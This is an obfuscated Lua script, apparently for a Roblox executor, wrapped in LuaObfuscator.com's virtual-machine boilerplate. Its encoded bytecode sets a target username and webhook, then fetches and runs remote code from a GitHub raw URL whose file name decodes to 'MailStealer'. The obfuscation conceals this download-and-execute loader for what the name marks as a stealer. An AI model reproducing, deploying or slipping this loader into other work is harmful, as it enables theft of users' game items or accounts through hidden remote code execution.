--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.8) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then local v83=0;while true do if (v83==0) then v19=v0(v3(v30,1,1));return "";end end else local v84=v2(v0(v30,16));if v19 then local v90=0;local v91;while true do if (v90==0) then v91=v5(v84,v19);v19=nil;v90=1;end if (v90==1) then return v91;end end else return v84;end end end);local function v20(v31,v32,v33)if v33 then local v85=877 -(282 + 595) ;local v86;while true do if (v85==(1637 -(1523 + 114))) then v86=(v31/((5 -3)^(v32-(2 -1))))%(2^(((v33-(1 -0)) -(v32-(2 -1))) + (620 -(555 + 64)))) ;return v86-(v86%(932 -(857 + 74))) ;end end else local v87=((513 + 57) -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v87 + v87))>=v87) and (1 + 0)) or ((0 -0) + 0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35=0 -0 ;local v36;local v37;while true do if (v35==1) then return (v37 * (373 -(32 + 85))) + v36 ;end if (v35==(0 + 0)) then v36,v37=v1(v16,v18,v18 + (1067 -(68 + (2377 -1380))) );v18=v18 + 1 + 1 ;v35=1271 -(226 + 1044) ;end end end local function v23()local v38=0 -0 ;local v39;local v40;local v41;local v42;while true do if (v38==(1 -0)) then return (v42 * (16777566 -(87 + 263))) + (v41 * (65716 -((1019 -(802 + 150)) + (303 -190)))) + (v40 * (188 + (123 -55))) + v39 ;end if (v38==(0 -(0 + 0))) then v39,v40,v41,v42=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (15 -11) ;v38=1;end end end local function v24()local v43=v23();local v44=v23();local v45=998 -(915 + 82) ;local v46=(v20(v44,439 -(145 + 293) ,(189 -133) -36 ) * ((2 + 0)^32)) + v43 ;local v47=v20(v44,7 + 14 ,40 -9 );local v48=((v20(v44,804 -((951 -750) + 571) )==(1188 -(1069 + 118))) and  -(2 -(1 + 0))) or ((3 -2) -0) ;if (v47==((1747 -(760 + 987)) + 0)) then if (v46==(0 -0)) then return v48 * (0 + 0) ;else local v92=1913 -(1789 + 124) ;while true do if (v92==(791 -(368 + 423))) then v47=3 -2 ;v45=766 -(745 + 21) ;break;end end end elseif (v47==2047) then return ((v46==(18 -(10 + 8))) and (v48 * ((3 -2)/(442 -(416 + 26))))) or (v48 * NaN) ;end return v8(v48,v47-(1817 -794) ) * (v45 + (v46/((6 -4)^(8 + 15 + 29)))) ;end local function v25(v49)local v50;if  not v49 then v49=v23();if (v49==(0 -0)) then return "";end end v50=v3(v16,v18,(v18 + v49) -(3 -2) );v18=v18 + v49 ;local v51={};for v67=1, #v50 do v51[v67]=v2(v1(v3(v50,v67,v67)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0 + 0 ;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if ((578 -(507 + 67))~=v52) then else while true do if (v53==(1751 -(1013 + 736))) then v58=nil;v59=nil;v53=3 + 0 ;end if (v53~=1) then else v56=nil;v57=nil;v53=4 -2 ;end if ((0 -0)==v53) then local v99=867 -(550 + 317) ;while true do if (v99~=(2 -1)) then else v53=1 -0 ;break;end if (v99~=(114 -(4 + 110))) then else v54=0 -0 ;v55=nil;v99=1;end end end if (v53==(587 -(57 + 527))) then v60=nil;while true do local v100=0 -0 ;local v101;while true do if (0==v100) then v101=1427 -(41 + 1386) ;while true do if (v101~=(286 -(134 + 151))) then else if (v54==(105 -(17 + 86))) then for v141=1666 -(970 + 695) ,v23() do local v142=0 + 0 ;local v143;local v144;while true do if (v142==(0 -0)) then v143=0;v144=nil;v142=1991 -(582 + 1408) ;end if (v142==(1 -0)) then while true do if (v143~=0) then else v144=v21();if (v20(v144,2 -1 ,167 -(122 + 44) )~=(0 -0)) then else local v175=0 -0 ;local v176;local v177;local v178;local v179;while true do if (1==v175) then v178=nil;v179=nil;v175=2 -0 ;end if (v175~=0) then else v176=0 + 0 ;v177=nil;v175=1 -0 ;end if ((7 -5)==v175) then while true do if (v176==(1825 -(1195 + 629))) then local v180=65 -(30 + 35) ;local v181;while true do if (v180~=0) then else v181=0 -0 ;while true do if ((241 -(187 + 54))==v181) then v179={v22(),v22(),nil,nil};if (v177==(0 -0)) then local v189=0;local v190;local v191;while true do if (v189~=(581 -(361 + 219))) then else while true do if (v190==0) then v191=320 -(53 + 267) ;while true do if (v191~=(780 -(162 + 618))) then else v179[3 + 0 ]=v22();v179[3 + 1 ]=v22();break;end end break;end end break;end if (v189==(0 -0)) then v190=0 -0 ;v191=nil;v189=1 + 0 ;end end elseif (v177==(414 -(15 + 398))) then v179[985 -(18 + 964) ]=v23();elseif (v177==2) then v179[3]=v23() -((1638 -(1373 + 263))^16) ;elseif (v177~=(1003 -(451 + 549))) then else local v198=0 + 0 ;local v199;local v200;while true do if ((1 + 0)==v198) then while true do if (v199==0) then v200=0 -0 ;while true do if (v200==(850 -(20 + 830))) then v179[4 -1 ]=v23() -(2^(1400 -(746 + 638))) ;v179[130 -(116 + 10) ]=v22();break;end end break;end end break;end if (v198~=(0 + 0)) then else v199=0 -0 ;v200=nil;v198=1;end end end v181=342 -(218 + 123) ;end if (v181==(1582 -(1535 + 46))) then v176=1 + 1 ;break;end end break;end end end if ((0 + 0)==v176) then local v182=0 + 0 ;local v183;while true do if (v182==0) then v183=0 -0 ;while true do if ((561 -(306 + 254))~=v183) then else v176=1;break;end if (v183==0) then v177=v20(v144,1 + 1 ,1 + 2 );v178=v20(v144,3 + 1 ,3 + 3 );v183=1 -0 ;end end break;end end end if (v176~=(1470 -(899 + 568))) then else if (v20(v178,2 + 1 ,7 -4 )~=(604 -(268 + 335))) then else v179[294 -(60 + 230) ]=v60[v179[4]];end v55[v141]=v179;break;end if (v176~=2) then else local v185=1121 -(118 + 1003) ;while true do if (v185==(2 -1)) then v176=575 -(426 + 146) ;break;end if (v185~=(0 + 0)) then else local v188=0;while true do if (v188~=(1456 -(282 + 1174))) then else if (v20(v178,4 -3 ,1)~=(812 -(569 + 242))) then else v179[5 -3 ]=v60[v179[1 + 1 ]];end if (v20(v178,1026 -(706 + 318) ,2 + 0 )==1) then v179[3 + 0 ]=v60[v179[2 + 1 ]];end v188=1252 -(721 + 530) ;end if (v188==(1 + 0)) then v185=2 -1 ;break;end end end end end end break;end end end break;end end break;end end end for v145=2 -1 ,v23() do v56[v145-(2 -1) ]=v28();end return v58;end break;end if (v101==(1271 -(945 + 326))) then if (v54~=(0 -0)) then else v55={};v56={};v57={};v58={v55,v56,nil,v57};v54=1;end if (v54~=1) then else local v119=0 + 0 ;while true do if (v119==1) then for v163=1,v59 do local v164=1500 -(1408 + 92) ;local v165;local v166;while true do if (v164~=1) then else if (v165==(1087 -(461 + 625))) then v166=v21()~=0 ;elseif (v165==(1290 -(993 + 295))) then v166=v24();elseif (v165~=3) then else v166=v25();end v60[v163]=v166;break;end if ((0 + 0)==v164) then local v172=1171 -(418 + 753) ;while true do if (v172~=(1 + 0)) then else v164=1 + 0 ;break;end if (v172==0) then v165=v21();v166=nil;v172=1 + 0 ;end end end end end v58[1 + 2 ]=v21();v119=1 + 1 ;end if ((529 -(406 + 123))~=v119) then else v59=v23();v60={};v119=732 -(476 + 255) ;end if (v119==(1771 -(1749 + 20))) then v54=2;break;end end end v101=1;end end break;end end end break;end end break;end if (v52==(1 + 2)) then v59=nil;v60=nil;v52=6 -2 ;end if (v52~=(1322 -(1249 + 73))) then else v53=0 + 0 ;v54=nil;v52=239 -(64 + 174) ;end if (v52==(1147 -(466 + 679))) then v57=nil;v58=nil;v52=3;end if (v52==(1 + 0)) then v55=nil;v56=nil;v52=2 -0 ;end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v69=v64;local v70=v65;local v71=v66;local v72=v27;local v73=1;local v74= -1;local v75={};local v76={...};local v77=v12("#",...) -1 ;local v78={};local v79={};for v88=0,v77 do if (v88>=v71) then v75[v88-v71 ]=v76[v88 + 1 ];else v79[v88]=v76[v88 + 1 ];end end local v80=(v77-v71) + 1 ;local v81;local v82;while true do local v89=0;while true do if (v89==0) then v81=v69[v73];v82=v81[1];v89=1;end if (v89==1) then if (v82<=10) then if (v82<=4) then if (v82<=1) then if (v82>0) then v79[v81[2]]();else v79[v81[2]]();end elseif (v82<=2) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end elseif (v82==3) then v73=v81[3];else do return;end end elseif (v82<=7) then if (v82<=5) then local v102=v81[2];local v103=v79[v81[3]];v79[v102 + 1 ]=v103;v79[v102]=v103[v81[4]];elseif (v82>6) then local v122=0;local v123;while true do if (v122==0) then v123=v81[2];v79[v123]=v79[v123](v13(v79,v123 + 1 ,v74));break;end end else local v124=v81[2];v79[v124]=v79[v124](v13(v79,v124 + 1 ,v74));end elseif (v82<=8) then do return;end elseif (v82==9) then v79[v81[2]]=v81[3];else v79[v81[2]]=v63[v81[3]];end elseif (v82<=15) then if (v82<=12) then if (v82==11) then v79[v81[2]][v81[3]]=v81[4];else v79[v81[2]]=v63[v81[3]];end elseif (v82<=13) then local v111=0;local v112;local v113;while true do if (v111==1) then v79[v112 + 1 ]=v113;v79[v112]=v113[v81[4]];break;end if (v111==0) then v112=v81[2];v113=v79[v81[3]];v111=1;end end elseif (v82>14) then v79[v81[2]]=v81[3];else v79[v81[2]][v81[3]]=v81[4];end elseif (v82<=18) then if (v82<=16) then local v114=0;local v115;local v116;local v117;local v118;while true do if (2==v114) then for v157=v115,v74 do local v158=0;while true do if (v158==0) then v118=v118 + 1 ;v79[v157]=v116[v118];break;end end end break;end if (v114==1) then v74=(v117 + v115) -1 ;v118=0;v114=2;end if (v114==0) then v115=v81[2];v116,v117=v72(v79[v115](v13(v79,v115 + 1 ,v81[3])));v114=1;end end elseif (v82==17) then v73=v81[3];else for v153=v81[2],v81[3] do v79[v153]=nil;end end elseif (v82<=19) then if (v79[v81[2]]==v81[4]) then v73=v73 + 1 ;else v73=v81[3];end elseif (v82==20) then for v155=v81[2],v81[3] do v79[v155]=nil;end else local v136=0;local v137;local v138;local v139;local v140;while true do if (v136==0) then v137=v81[2];v138,v139=v72(v79[v137](v13(v79,v137 + 1 ,v81[3])));v136=1;end if (v136==1) then v74=(v139 + v137) -1 ;v140=0;v136=2;end if (v136==2) then for v167=v137,v74 do local v168=0;while true do if (v168==0) then v140=v140 + 1 ;v79[v167]=v138[v140];break;end end end break;end end end v73=v73 + 1 ;break;end end end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403623O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F486F73742O655363726970747A2F486F73742O654875622F6D61696E2F2545322539432539372532304D61696C537465616C657225323025453225394325393703023O005F4703093O00557365724E616D657903093O0050696572636550535803083O00576562682O6F6B792O033O004E6F6E001A3O00120F3O00014O0012000100013O0026023O0002000100010004113O0002000100120F000100013O0026020001000F000100020004113O000F000100120C000200033O00120C000300043O00200500030003000500120F000500064O0010000300054O000700023O00022O00010002000100010004113O0019000100260200010005000100010004113O0005000100120C000200073O00300B00020008000900120C000200073O00300B0002000A000B00120F000100023O0004113O000500010004113O001900010004113O000200012O00083O00017O00",v9(),...);end

